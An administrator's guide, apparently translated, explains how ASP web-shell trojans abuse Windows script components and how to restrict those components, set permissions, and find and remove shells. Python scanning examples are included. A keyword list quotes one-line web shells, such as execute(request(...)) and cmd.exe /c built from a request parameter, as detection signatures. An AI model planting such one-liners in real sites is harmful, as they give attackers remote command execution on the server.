How ASP Trojans Work and Basic Precautions

Source: Internet
Author: User

ASP Trojans are rampant, and any ASP-based site is constantly at risk. What does a server administrator need to do to keep the site protected at all times, and how can ASP Trojans be prevented? To prevent them, we first need to understand how they operate. Let's start with a piece of code:

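Set oscript = Server.CreateObject("Wscript.SHELL") ' Creates a Wscript.Shell object named oscript for command execution
Set oscriptNet = Server.CreateObject("Wscript.NETWORK") ' Creates a Wscript.Network object for network information (computer, user and domain names)
Set oFileSys = Server.CreateObject("scripting.FileSystemObject") ' Creates a FileSystemObject for reading and writing files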

These three lines create three objects: Wscript.Shell, Wscript.Network and Scripting.FileSystemObject. As we can see, an ASP Trojan works by invoking component objects such as these.

Analysis of several ASP Trojans shows that they mainly run through three components. The first is the one we all know, FSO, that is, "Scripting.FileSystemObject". Some people will ask: can't we just delete this component? No, because many programs today use FSO, and removing it stops those normal programs from running. Many tutorials online tell people to delete or restrict it; these methods are very extreme, and I do not recommend them. Then there are the other dangerous components, such as "Shell.Application" and "Wscript.Shell", which Trojans generally use. Even if you restrict FSO, the restriction is not effective unless you restrict these other components too. Unlike FSO, these other components are not normally needed, so we can deal with them directly in the registry.

Under HKEY_CLASSES_ROOT, find "Shell.Application", "Wscript.Shell" and the other dangerous script objects (dangerous because they are used to create a script command channel) and rename or delete them. This restricts the system's ability to create a "script shell", and the ASP Trojan can no longer function: you cannot make bricks without straw. If we still want to use a component, then rather than deleting it we rename it. When renaming, choose a more complex name that others cannot guess; our own programs then simply call the component by the new name.
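Before renaming or deleting a ProgID it helps to know which of the site's own pages instantiate it, since those callers must be updated to the new name. The following is an added example, not code from the original article; the sample pages, their paths and the action labels are constructed for illustration.

```python
import re
from collections import defaultdict

# ProgIDs the article names as dangerous; compared in lower case.
DANGEROUS = {"wscript.shell", "shell.application"}
# The article advises against removing FSO because normal programs need it.
KEEP = {"scripting.filesystemobject"}

# Matches CreateObject("ProgID") and Server.CreateObject("ProgID") with a
# literal name; a name built by string concatenation is not detected.
CREATE_RE = re.compile(r'CreateObject\s*\(\s*"([^"]+)"\s*\)', re.IGNORECASE)

def inventory(pages):
    """Map each lower-cased ProgID to the sorted pages that instantiate it."""
    users = defaultdict(set)
    for path, source in pages.items():
        for progid in CREATE_RE.findall(source):
            users[progid.strip().lower()].add(path)
    return {progid: sorted(paths) for progid, paths in users.items()}

def restriction_plan(pages):
    """Return {progid: (action, callers)} for the components discussed above."""
    plan = {}
    for progid, callers in inventory(pages).items():
        if progid in DANGEROUS:
            plan[progid] = ("rename, then update callers", callers)
        elif progid in KEEP:
            plan[progid] = ("keep", callers)
    for progid in sorted(DANGEROUS - set(plan)):
        plan[progid] = ("rename or delete, no callers", [])
    return plan

# Constructed sample pages (hypothetical paths and code).
SAMPLE_PAGES = {
    "inc/upload.asp": 'Set fso = Server.CreateObject("Scripting.FileSystemObject")',
    "admin/ping.asp": 'Set sh = server.createobject( "WScript.Shell" )',
    "default.asp": 'Set conn = Server.CreateObject("ADODB.Connection")',
}

if __name__ == "__main__":
    for progid, (action, callers) in sorted(restriction_plan(SAMPLE_PAGES).items()):
        print(f"{progid:28} {action:30} {callers}")
```

In practice `pages` would be filled by reading every script file under the web root.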

After restricting the components, we should also set strict permissions on the server. I will not go into them here for reasons of length; I do not know how long it would take to write. You can refer to the security permission guides available on the Internet. With permissions and components both set, the harm from ASP Trojans can basically be prevented.

One more point: if you do find a Trojan, then after removing it, every type of account with administrative rights should be changed, including forum accounts, database accounts, server operating system accounts, FTP accounts and so on. If we do these few things, our server is basically safe. Why only "basically"? Because no server in the world is completely secure. The settings described above prevent most ASP Trojan attacks, but they do not rule out other factors, such as privilege escalation. Put plainly, defending against ASP Trojans means restricting components, setting strict permissions and ensuring the security of the ASP programs themselves.

Next, how to find and remove ASP Trojans. Here are several methods based on my own experience.

1. Time comparison method

Sort by modification time to find the most recently changed ASP files and open them to see whether they are Trojans. Don't understand the code? Then look for ASP files that are not your own; the names often give them away at a glance, for example files such as diy.ap.dm6.asp,angel.asp.shell.asp. Delete suspicious ASP files that you did not create yourself, or request them directly to see whether they are Trojans.

2. Keyword search method

ASP Trojans contain keywords, much like virus signatures. We can use the search function built into Windows to find every file whose content contains a keyword, and then examine the results. Sometimes the search turns up some large ASP files; on a virtual host, these are generally database files that were renamed to .asp. If the hit is a one-line Trojan keyword, examine the file carefully; if it is a keyword from a large Trojan, visit the page to check. I do not agree with renaming the database to .asp; as for why, we all know.

I have collected some signatures, listed here for everyone:

gxgl
lcx
<script RUNAT=SERVER LANGUAGE=JAVAscript>eval(Request.form('#')+'')</script>
输入马的内容
session("b")
request("kker")
非常遗憾,您的主机不支持ADODB.Stream,不能使用本程序
传至服务器已有虚拟目录
警告:对非法使用此程序可能带来的任何不良后果责任自负!请勿用于非法用途!!!
<%execute request("value")%>
ccopus<
<%execute(request("#"))%>
<script language="vbscript" runat=server>if reques(#")<>"" then execute(request("#"))</script>
("cmd.exe /c "&request.form("cmd")).
("cmd.exe /c "&request("cmd")).
("cmd.exe /c "&request("c")).

These are the keywords, all of which I extracted from Trojans. A file with these characteristics is generally a Trojan, but it is best to open it and look, since special cases cannot be ruled out. If your site contains code like <iframe src= "http://www.***.com" ></iframe>, a malicious link has probably been added or the site has had malicious code planted in it, which is nasty; in that case, search for the keyword "iframe src".

3. You can also use Ming Kid's ASP Trojan scanner, a small tool: put my keywords in and scan. It is quite convenient.

4. If the site's structure is clear, browsing the directories can quickly identify Trojans. A file that appears where it should not can be deleted whether or not it is a Trojan. For example, ASP files should not appear in folders such as Upfile under Dvbbs; delete any we find there. However, this requires administrators to be familiar with their site's directory structure.

5. Another method to try is backups: once you discover that someone has broken in, restore immediately, and then no Trojan is to be feared. Note, however, that the backup files themselves must be clean; if the backup contains a Trojan, restoring achieves nothing.

6. Use an ASP Trojan detection tool, downloaded from the Internet, to find and remove them. Our usual anti-virus software also has this capability; I recommend Cabas machine, which works very well and can remove almost all of today's popular ASP Trojans.
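Methods 1, 2 and 4 can be combined into a single pass over the web root. The scanner below is an added example, not code from the original article or from any tool it names; the regexes are generalised from the signature list above, and the upload folder names and the three-file sample site are assumptions constructed for illustration.

```python
import os, re, tempfile, time
from pathlib import Path
SIGNATURES = {  # regexes generalised from the article's list (added here)
    "execute-request": re.compile(r"\bexecute\s*\(?\s*request\s*\(", re.I),
    "eval-request": re.compile(r"\beval\s*\(\s*request\b", re.I),
    "cmd-from-request": re.compile(r'cmd\.exe\s*/c\s*"\s*&\s*request\b', re.I),
    "iframe-src": re.compile(r"<iframe\s+src\s*=", re.I),
}
SCRIPT_EXT = (".asp", ".asa")        # extensions treated as server-side script
UPLOAD_DIRS = {"upfile", "upload"}   # assumed names of upload folders

def scan(root, recent_days=7, now=None):
    """Return [(relative_path, reasons)] for suspicious files, newest first."""
    now = time.time() if now is None else now
    hits = []
    for path in (p for p in Path(root).rglob("*") if p.is_file()):
        rel = path.relative_to(root)
        mtime = path.stat().st_mtime
        text = path.read_bytes().decode("latin-1")  # latin-1 decodes any byte
        # Method 2: keyword search in every file, since shells hide in images.
        reasons = [k for k, rx in SIGNATURES.items() if rx.search(text)]
        if path.suffix.lower() in SCRIPT_EXT:
            if UPLOAD_DIRS & {part.lower() for part in rel.parts[:-1]}:
                reasons.append("script-in-upload-dir")  # method 4
            if now - mtime < recent_days * 86400:
                reasons.append("recently-modified")  # method 1, mtimes can be forged
        if reasons:
            hits.append((mtime, rel.as_posix(), reasons))
    return [(rel, why) for _mtime, rel, why in sorted(hits, reverse=True)]

def build_sample(root):
    """Write a constructed three-file site under root, each file dated 30 days ago."""
    old = time.time() - 30 * 86400
    sample = {
        "index.asp": '<% Response.Write "hello" %>',
        "upfile/face.asp": '<% Response.Write "misplaced but harmless" %>',
        "images/logo.gif": 'GIF89a<%execute request("value")%>',
    }
    for rel, body in sample.items():
        path = Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(body)
        os.utime(path, (old, old))

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:
        build_sample(site)
        print(scan(site))
```

Every hit is a candidate for manual review, as the article advises, not a verdict; the iframe pattern in particular also matches legitimate pages.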

The above is only a brief introduction to some ways of removing ASP Trojans. Of course, these are remedies after the fact. It is best to set strict permissions on the server system, so that even if an attacker uploads a Trojan it is of no use. I do not know how much I would have to write about permission restrictions, and the material on the Internet is very comprehensive, so you can look it up yourselves. ASP Trojans today hide very cleverly: code encryption, merging into images and file time modification, plus critical system vulnerabilities, make finding and removing all of them almost impossible. All we can do is block the source of Trojan uploads: keep ASP programs on the latest version where possible; pay special attention to the site's own upload functions; for folders that do not need to run scripts, set the execute permission to None in IIS; and the administrator needs good security awareness, otherwise nothing is safe. Once permissions are set properly, a Trojan that does get uploaded is uploaded in vain.
